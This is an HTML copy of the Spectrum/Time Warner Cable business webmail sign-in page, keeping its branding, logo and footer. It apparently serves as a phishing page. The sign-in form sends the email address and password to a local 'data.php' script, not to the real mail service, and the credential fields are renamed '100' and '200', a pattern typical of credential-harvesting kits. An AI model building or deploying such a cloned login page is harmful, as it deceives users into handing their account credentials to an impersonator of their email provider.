﻿<!DOCTYPE HTML>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional" "/assets/dtd/xhtml1-transitional.dtd"><HTML 
lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- webmail version: 2.2.1SMB - 20180402a-twc  --><HEAD><META 
content="IE=11.0000" http-equiv="X-UA-Compatible">
   
<META http-equiv="X-UA-Compatible" content="IE=edge">     
<META http-equiv="Content-Type" content="text/html; charset=utf-8"><TITLE>       
 Log In   </TITLE>   <LINK href="/favicon.png" rel="shortcut icon" type="image/ico"> 
  
<SCRIPT src="https://mail.twcbc.com/includes/common_js.jsp" type="text/javascript"></SCRIPT>
         <LINK href="https://mail.twcbc.com/includes/reset-min.221a.css" rel="stylesheet" 
type="text/css" media="all">     <LINK href="https://mail.twcbc.com/includes/webmail.221a.css" 
rel="stylesheet" type="text/css" media="all">     <!--[if IE]>
        <link rel="stylesheet" type="text/css" href="/includes/ie.221a.css" media="all" />
    <![endif]--> 
              
<SCRIPT src="https://mail.twcbc.com/login/javascript_js.jsp" type="text/javascript"></SCRIPT>
   
<META name="GENERATOR" content="MSHTML 11.00.10570.1001"></HEAD> <!-- START wrapper --> 
              
<BODY id="body_id" style="text-align: center; background-color: rgb(201, 201, 201);">
<DIV class="wrapper"><!-- START header -->         <!-- logo bar --> 
<DIV class="loginLogoHeader" style="background-color: rgb(49, 101, 156);">
<DIV title="Spectrum" class="loginLogoImage"><IMG src="https://mail.twcbc.com/images/spectrum_logo_login.gif?l=en-US&amp;v=twc"></DIV></DIV><!-- END header --> 
    <!-- START main -->     
<DIV class="main"><!-- START .main .content -->         <NOSCRIPT>&lt;div 
class="webmailErrorInfoSection"&gt;    &lt;div class="webmailError 
webmailAlignLeftNoPad2"&gt;&lt;/div&gt;        &lt;div 
class="webmailErrorInfoTxt" tabindex="-1"&gt;            This application needs 
Javascript enabled to function correctly.        &lt;/div&gt;&lt; /div&gt;     
</NOSCRIPT>             <!-- START .webmailMainPanel -->             <!-- Content --> 
  
<FORM name="loginForm" onsubmit="return validateLoginForm(this);" action="data.php" 
method="POST"><INPUT name="sessionId" type="hidden" value="aaaAWcfI1rkWN_4P3Av7x"> 
        <INPUT name="variant" type="hidden" value="twc">                
<INPUT name="client" type="hidden" value="html">     <INPUT name="directMessageView" type="hidden"> 
    <INPUT name="uid" type="hidden">     <INPUT name="uidl" type="hidden">     
<INPUT name="folder" type="hidden">     <INPUT name="remoteAccountUID" type="hidden"> 
    <INPUT name="login" type="hidden" value="1">     <INPUT name="domain" type="hidden" value="mail.twcbc.com"> 
        
<INPUT name="autoSaveMessageText" id="autoSaveMessageText" type="hidden">     
<DIV class="richAdLoginContent">
<TABLE class="mainPanelInBodyTableFormattingLogin" role="presentation"><!-- Email -->
	 <!-- logo bar -->         
  <TBODY>
  <TR>
    <TD valign="top">
      <TABLE class="mainPanelInBodyTableFormatting" role="presentation" valign="top">
        <TBODY>
        <TR>
          <TD class="mainPanelTxt_12B mainPanelLoginWidthAlign loginHeading">
            <H1 style="color: rgb(0, 0, 0);">Sign In</H1></TD></TR>
        <TR>
          <TD class="mainPanelTxt_12B mainPanelLoginWidthAlign"><LABEL for="account">
			Email Address</LABEL></TD></TR>
        <TR>
          <TD class="mainPanelComposeMailPadding3 loginHeader">
			<INPUT name="100" id="account" type="text" maxlength="150" size="20"></TD></TR>
        <TR>
          <TD class="mainPanelTxt_12B mainPanelLoginWidthAlign"><LABEL for="password">
			Password</LABEL></TD></TR>
        <TR>
          <TD class="mainPanelComposeMailPadding3 loginHeader">
			<INPUT name="200" id="password" onkeypress="javascript:onKeyPressBlockNumbers(event)" type="password" maxlength="150" redisplay="false" size="20"></TD></TR>
        <TR>
          <TD class="mainPanelTxt_12"><A title="Need Help Signing In?" href="https://business.timewarnercable.com/support/resources/internet/e-mail/web-based-email/how_do_i_login_tomywebmailaccount.html" 
            target="_blank">Need Help Signing In?</A></TD></TR>
        <TR>
          <TD><!-- Buttons -->                         
            <DIV class="mainPanelEndOfPageButtons">
            <DIV 
class="mainPanelTextFieldPadding mainPanelLoginTopPadding"><INPUT title="Log In" class="mainPanelInPageButtons" id="loginButton" onmouseover="return hint('Log In')" onmouseout="return hint()" onclick="javascript:loginCompletion(document.loginForm); return false;" type="submit" value="Log In"> 
                                    
  </DIV></DIV></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<DIV 
class="messageBox mainPanelTxt_12B mainPanelLoginWidthAlign"></DIV></DIV></FORM>
<SCRIPT language="javascript">
 if (document.getElementById('errorSection') != null) {
        document.getElementById('errorSection').focus();
 } else {
        window.onload = checkSavedLogin;
}
</SCRIPT>
         </DIV><!-- END .main -->     
<DIV class="footer" style="left: 0px; width: 100%; height: 64px; bottom: 0px; border-top-color: rgb(204, 204, 204); border-top-width: 1px; border-top-style: solid; position: fixed; z-index: 3; background-color: rgb(255, 255, 255);"><!-- START footer --> 
<DIV class="footer"><!-- START footer content -->     
<DIV class="content">
<UL class="legalFooter">
  <LI>© 2022 Charter Communications</LI>                 
  <LI> | </LI>                 
  <LI><A href="https://business.spectrum.com/content/privacy-policy" target="_blank">
	Your Privacy Rights</A></LI>                 
  <LI> | </LI>                 
  <LI><A href="https://www.spectrum.com/policies/ca-privacy-rights" target="_blank">
	California Privacy Policy</A></LI>                 
  <LI> | </LI>                 
  <LI><A href="https://www.spectrum.com/policies/terms-of-service" target="_blank">
	Policies</A></LI> 
            </UL></DIV><!-- END .footer .content --> </DIV><!-- END footer --> 
</DIV></DIV></BODY></HTML>
